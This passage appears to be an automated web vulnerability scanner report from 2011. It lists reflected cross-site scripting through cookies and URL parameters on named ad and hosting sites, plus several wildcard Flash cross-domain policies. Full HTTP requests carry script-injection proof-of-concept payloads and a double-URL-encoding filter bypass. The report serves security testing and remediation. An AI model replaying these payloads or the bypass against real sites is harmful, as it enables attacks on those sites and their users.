Connection: close
Set-Cookie: ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:01 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:01 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296999601; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25239
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264255445",Pid:"p68511049",Arc:"185637072",Location: ...[SNIP]... ();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&99107<script>alert(1)</script>48b53053bd9', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01: ...[SNIP]...
The value of the ar_p68511049 cookie is copied into the HTML document as plain text between tags. The payload 6f161<script>alert(1)</script>116bcb4cb71 was submitted in the ar_p68511049 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264255445&AR_C=185637072 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&6f161<script>alert(1)</script>116bcb4cb71; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 13:40:02 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:02 2011&6f161<script>alert(1)</script>116bcb4cb71=&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:02 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296999602; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25239
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264255445",Pid:"p68511049",Arc:"185637072",Location: ...[SNIP]... Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&6f161<script>alert(1)</script>116bcb4cb71' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http ...[SNIP]...
The value of the ar_p83612734 cookie is copied into the HTML document as plain text between tags. The payload 737bb<script>alert(1)</script>d3335e0ecc7 was submitted in the ar_p83612734 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264255445&AR_C=185637072 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&737bb<script>alert(1)</script>d3335e0ecc7; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 13:40:01 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:01 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:01 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296999601; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25239
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264255445",Pid:"p68511049",Arc:"185637072",Location: ...[SNIP]... t Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&737bb<script>alert(1)</script>d3335e0ecc7', "ar_p68511049": 'exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&' }; COMSCORE.BMX.Broker.GlobalConfig={ "urlExcludeList": "http://photobucket. ...[SNIP]...
The value of the ar_p85001580 cookie is copied into the HTML document as plain text between tags. The payload 37efe<script>alert(1)</script>0b4fc9ef21a was submitted in the ar_p85001580 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264255445&AR_C=185637072 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&37efe<script>alert(1)</script>0b4fc9ef21a; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:03 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:03 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:03 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296999603; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 25239
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264255445",Pid:"p68511049",Arc:"185637072",Location: ...[SNIP]... 011&prad=55352400&cpn=4&arc=38899481&', "UID": '1d29d89e-72.246.30.75-1294456810', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&37efe<script>alert(1)</script>0b4fc9ef21a', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5 ...[SNIP]...
The value of the adsud cookie is copied into the HTML document as plain text between tags. The payload eb669<script>alert(1)</script>2ccf81f300f was submitted in the adsud cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /a/e/r21719?5170057 HTTP/1.1 Host: c03.adsummos.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adsuu=vmkju57YZhpA; adsud=BLU0YPLeb669<script>alert(1)</script>2ccf81f300f; adsud9=
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 331 Content-Type: application/javascript Set-Cookie: CMP=; expires=Fri, 06 May 2011 22:26:52 GMT; path=/; domain=.adsummos.net; Set-Cookie: adsud9=; expires=Fri, 06 May 2011 22:26:52 GMT; path=/; domain=.adsummos.net; ETag: "d98ff88b2ecbaa69302dcef0a5670a60:1296529755" P3P: CP="NOI DSP COR NID CUR ADM DEV TAI PSAo PSDo OUR STP UNI COM NAV STA" P3P: CP="NOI DSP COR NID CUR ADM DEV TAI PSAo PSDo OUR STP UNI COM NAV STA" Cache-Control: max-age=86400 Date: Sat, 05 Feb 2011 22:26:52 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a95b4<a>230da93002d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /go/55498a95b4<a>230da93002d/http:/resolve.iscool.net/ HTTP/1.1 Host: www.download32.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=f1d128b0b804710c566c802ba5200831; __qca=P0-1697810850-1296942494788;
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 364ad<a>7bbef7c128b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /go/55498/http:364ad<a>7bbef7c128b/resolve.iscool.net/ HTTP/1.1 Host: www.download32.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=f1d128b0b804710c566c802ba5200831; __qca=P0-1697810850-1296942494788;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a80ad%2527%253b5ce21070ae6 was submitted in the IS_UASrackuid cookie. This input was echoed as a80ad';5ce21070ae6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the IS_UASrackuid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /apps/email_hosting/exchange_hosting/ HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsea_cust=1; lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=47003812.1296921517.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; s_sq=%5B%5BB%5D%5D; s_ppv=5; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; chatslidercookie=invitesent; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a80ad%2527%253b5ce21070ae6; _vis_opt_s=1%7C; livechat=instantservice; s_cc=true; PHPSESSID=4fd4e850dc445f927d55acdbc1e84403; chatslider=B; __utma=47003812.1362301340.1296919297.1296921517.1297007047.3; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.1.10.1297007047; s_pv=rackspaceUS%3Ablog%3Ahome;
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged-in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad-emea.doubleclick.net
Response
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 393 Last-Modified: Wed, 22 Oct 2008 17:22:36 GMT Date: Sun, 06 Feb 2011 17:43:33 GMT
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.doubleclick.net --> <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.de.doubleclick.net
Response
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 393 Last-Modified: Wed, 22 Oct 2008 17:22:36 GMT Date: Sun, 06 Feb 2011 17:43:28 GMT
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.doubleclick.net --> <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad.zanox.com
Response
HTTP/1.1 200 OK Content-Length: 330 Content-Type: text/xml Last-Modified: Thu, 17 Sep 2009 16:58:09 GMT Accept-Ranges: bytes ETag: "5ed8c08b837ca1:4a9" Server: Microsoft-IIS/6.0 P3P: policyref="http://ad.zanox.com/w3c/p3p.xml", CP="NOI CUR OUR STP" X-Powered-By: ASP.NET Date: Sun, 06 Feb 2011 17:37:36 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: api.bit.ly
Response
HTTP/1.1 200 OK Server: nginx Date: Sat, 05 Feb 2011 23:32:43 GMT Content-Type: text/xml Content-Length: 141 Last-Modified: Mon, 09 Aug 2010 21:22:00 GMT Connection: close Expires: Mon, 07 Feb 2011 23:32:43 GMT Cache-Control: max-age=172800 Accept-Ranges: bytes
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ar.voicefive.com
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:00 GMT Content-Type: text/xml Connection: close Vary: Accept-Encoding Accept-Ranges: bytes Content-Length: 230 Vary: Accept-Encoding,User-Agent P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: au2m8.com
Response
HTTP/1.1 200 OK Set-Cookie: ARPT=NQJKKYS192.168.100.219CKOWU; path=/ Date: Sun, 06 Feb 2011 13:24:34 GMT Server: Apache Last-Modified: Wed, 03 Dec 2008 12:41:21 GMT ETag: "b6843d-66-45d23c2d7be40" Accept-Ranges: bytes Content-Length: 102 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: b.voicefive.com
Response
HTTP/1.0 200 OK Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT Content-Type: application/xml Expires: Mon, 07 Feb 2011 13:40:00 GMT Date: Sun, 06 Feb 2011 13:40:00 GMT Content-Length: 201 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: blog.vibrantmedia.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 02 Mar 2005 18:36:18 GMT Accept-Ranges: bytes ETag: "03debb8561fc51:0" Server: Microsoft-IIS/7.5 p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 22:45:44 GMT Connection: close Content-Length: 202
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: bs.serving-sys.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT Accept-Ranges: bytes ETag: "0e2c3cba13c91:0" P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 06 Feb 2011 13:21:30 GMT Connection: close Content-Length: 100
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: cdn.manualsonline.com
Response
HTTP/1.0 200 OK Server: Apache/2.2.14 (Fedora) Last-Modified: Wed, 26 Jan 2011 14:52:42 GMT ETag: "810108-ef-49ac0fc2c4280" Accept-Ranges: bytes Content-Length: 239 Content-Type: text/xml Date: Sat, 05 Feb 2011 22:46:27 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: cdn.royale.spongecell.com
Response
HTTP/1.0 200 OK Server: nginx/0.6.35 Content-Type: text/xml Content-Length: 325 Vary: Accept-Encoding Accept-Ranges: bytes Date: Sat, 05 Feb 2011 22:46:28 GMT Last-Modified: Fri, 06 Aug 2010 01:11:11 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: cdn.w55c.net
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:49:03 GMT Server: Jetty(6.1.22) Cache-Control: max-age=86400 Content-Length: 504 content-type: application/xml Age: 0 Via: 1.1 mdw061004 (MII-APC/1.6) Connection: close
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy>
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
